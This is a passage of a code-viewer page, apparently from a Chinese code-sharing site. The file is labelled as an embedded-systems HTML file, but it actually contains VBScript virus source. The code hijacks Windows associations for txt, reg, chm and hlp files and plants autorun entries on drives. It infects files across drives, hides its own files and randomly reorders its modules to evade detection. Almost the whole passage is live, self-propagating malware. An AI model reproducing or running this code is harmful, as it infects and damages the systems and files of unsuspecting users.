📄 lpc214x_ucosii.htm
字号:
End Function
'ZLDXJAQBZXV2_26
'SQWYMRCQHRYPK2_16
Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub
'ZLDXJAQBZXV2_16
'SQWYMRCQHRYPK2_15
Sub SetFileAttr(objfso, pathf)
Dim vf
Set vf = objfso.GetFile(pathf)
vf.Attributes = 6
End Sub
'ZLDXJAQBZXV2_15
'SQWYMRCQHRYPK1_1
On Error Resume Next
Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V
Dim ModelHead, ModelTail
Cnt = 0
CntMax = 1000
Version = "4"
Name_V1 = GetUserName() & ".vbs"
FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向
FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令
FullPath_Config= GetSFolder(1) & GetUserName() & ".ini"
Sum_ModelCode = 26
Head_V= GetHeadTail(0)
Tail_V= GetHeadTail(1)
ModelHead="'SQWYMRCQHRYPK"
ModelTail="'ZLDXJAQBZXV"
Call WebMain()
Sub WebMain()
On Error Resume Next
Call ExeVbs_WebPage()
End Sub
'ZLDXJAQBZXV1_1
'SQWYMRCQHRYPK1_8
Sub RestoreSystem(objfso)
On Error Resume Next
Dim Value, dc, d, HCULoad
Call SafeSet()
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
If ReadReg(HCULoad) = FullPath_V1 Then
Call DeleteReg(HCULoad)
End If
Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "regedit.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = GetSFolder(1) & "hh.exe " & """%1"""
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = "%SystemRoot%\system32\winhlp32.exe %1"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End If
Value = """%1"" %*"
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
End If
Set dc = objfso.Drives
For Each d In dc
If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
End If
Next
If objfso.FileExists(FullPath_V1) = True Then
Set vf = objfso.GetFile(FullPath_V1)
vf.Delete
End If
If objfso.FileExists(FullPath_V0) = true Then
Set vf = objfso.GetFile(FullPath_V0)
vf.Delete
End If
If objfso.FileExists(FullPath_Config) = True Then
objfso.DeleteFile FullPath_Config , True
End If
End Sub
'ZLDXJAQBZXV1_8
'SQWYMRCQHRYPK1_3
Sub ExeVbs_Virus()
On Error Resume Next
Dim objfso, objshell, FullPath_Self, Name_Self, Names
Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
Dim Order, Order_Order, Order_Para
Dim vbsCode , VbsCode_Virus, VbsCode_WebPage, VbsCode_Victim , MainBody
Set objfso = CreateObject(GetFSOName())
Set objshell = CreateObject("WScript.Shell")
FullPath_Self = WScript.ScriptFullName
Name_Self = WScript.ScriptName
Names = Array("SQWYMRCQHRYPK", "ZLDXJAQBZXV")
Set oArgs = WScript.Arguments
ArgNum = 0
Do While ArgNum < oArgs.Count
Para_V = Para_V & " " & oArgs(ArgNum)
ArgNum = ArgNum + 1
Loop
SubPara_V = LCase(Right(Para_V, 3))
Select Case SubPara_V
Case "run"
RunPath = Left(FullPath_Self, 2)
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "txt", "log"
RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Para_V
Call Run(RunPath)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "reg"
Para_V = "regedit.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "chm"
Para_V = "hh.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case "hlp"
Para_V = "winhlp32.exe " & """" & Trim(Para_V) & """"
Call Run(Para_V)
vbsCode = GetSelfCode(objfso, FullPath_Self)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call Run(FullPath_V1)
Case Else
If PreInstance = True Then
WScript.Quit
End If
If IsOK(objfso, Date(), FullPath_Config) = False Then
If objfso.FileExists(FullPath_Config) = True Then
Order = Trim(ReadOK(objfso, FullPath_Config))
Order_Order = Trim(Mid(Order, 1, InStr(1, Order, "@") -1))
Order_Para = Trim(Mid(Order, InStr(1, Order, "@") + 1, Len(Order) - InStr(1, Order, "@")))
End If
Select Case Order_Order
Case "InfectFiles"
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Order_Para = Order_Para + Cnt
If Order_Para>2000 Then
Call WriteOK(objfso, FullPath_Config, "Msg", "您已有超过2000个文件被感染!不过请放心,此病毒很容易被清除!请联系418465***-_- !")
Else
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Order_Para)
End If
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "Msg"
MsgBox Order_Para
Call WriteOK(objfso, FullPath_Config, "", "")
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
Case "UnLoadMe"
Call RestoreSystem(objfso)
Wscript.Quit
Case "KillVirus"
Call RestoreSystem(objfso)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 1)
Wscript.Quit
Case Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_WebPage = Head_V & Version & VBCRLF & WebHead() & MainBody & VBCRLF & Tail_V
VbsCode_WebPage = ChangeModelOrder(VbsCode_WebPage, Sum_ModelCode)
VbsCode_WebPage = ChangeName(VbsCode_WebPage, Names)
VbsCode_Victim = Head_V & Version & VBCRLF & VictimHead() & MainBody & VBCRLF & Tail_V
VbsCode_Victim = ChangeModelOrder(VbsCode_Victim, Sum_ModelCode)
VbsCode_Victim = ChangeName(VbsCode_Victim, Names)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode)
VbsCode_Virus = ChangeName(VbsCode_Virus, Names)
Call SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, 0)
Call WriteOK(objfso, FullPath_Config, "InfectFiles", Cnt)
Call InvadeSystem(objfso, VbsCode_Virus)
Call MonitorSystem(objfso, VbsCode_Virus)
End Select
Else
vbsCode = GetSelfCode(objfso, FullPath_Self)
MainBody = GetMainBody(vbsCode, Sum_ModelCode)
VbsCode_Virus = Head_V & Version & VBCRLF & VirusHead() & MainBody & VBCRLF & Tail_V '生成病毒体完整代码
VbsCode_Virus = ChangeModelOrder(VbsCode_Virus, Sum_ModelCode) '改变模块组合顺序
VbsCode_Virus = ChangeName(VbsCode_Virus, Names) '改变模块标志名称
Call MonitorSystem(objfso, VbsCode_Virus)
End If
End Select
Set objfso = Nothing
Set objshell = Nothing
End Sub
'ZLDXJAQBZXV1_3
'SQWYMRCQHRYPK2_23
Function MakeScript(strCode, T)
If T = 1 Then
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & ChangeModelOrder(strCode, Sum_ModelCode) & VBCRLF & "</" & "SCRIPT>"
Else
MakeScript = "<" & "SCRIPT Language = VBScript>" & VBCRLF & strCode & VBCRLF & "</" & "SCRIPT>"
End If
End Function
'ZLDXJAQBZXV2_23
'SQWYMRCQHRYPK1_9
Function ChangeModelOrder(vbsCode, Num_DNA)
On Error Resume Next
Dim DNA(), Array_vbsCode()
Dim i, Value, flag, j, buffer
ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
buffer = vbsCode
Randomize
For i = 1 To Num_DNA
Do
Value = Int((Num_DNA * Rnd) + 1)
flag = 1
For j = 1 To Num_DNA
If Value = DNA(j) Then
flag = 0
Exit For
End If
Next
Loop Until flag = 1
DNA(i) = Value
Next
For i = 1 To Num_DNA
Array_vbsCode(i) = GetModelCode(buffer, i)
Next
buffer = ""
For i = 1 To Num_DNA
buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
Next
ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
End Function
'ZLDXJAQBZXV1_9
'SQWYMRCQHRYPK2_13
Sub DeSafeSet()
Dim HLMShow , HCUAdvanced, HCUExplorer
HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
HCUExplorer = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
Call WriteReg (HCUExplorer, 129, "REG_DWORD")
Call WriteReg (HCUAdvanced, 0, "REG_DWORD")
Call WriteReg (HLMShow, 0, "REG_DWORD")
End Sub
Sub SafeSet()
Dim HLMShow , HCUSSHidden, HCUHidden
Dim HCUExplorer
HLMShow = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
HCUAdvanced = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"
HCUHidden = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
Call WriteReg (HCUHidden, 1, "REG_DWORD")
Call WriteReg (HCUAdvanced, 1, "REG_DWORD")
Call WriteReg (HLMShow, 1, "REG_DWORD")
End Sub
'ZLDXJAQBZXV2_13
'SQWYMRCQHRYPK1_2
Sub ExeVbs_WebPage()
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -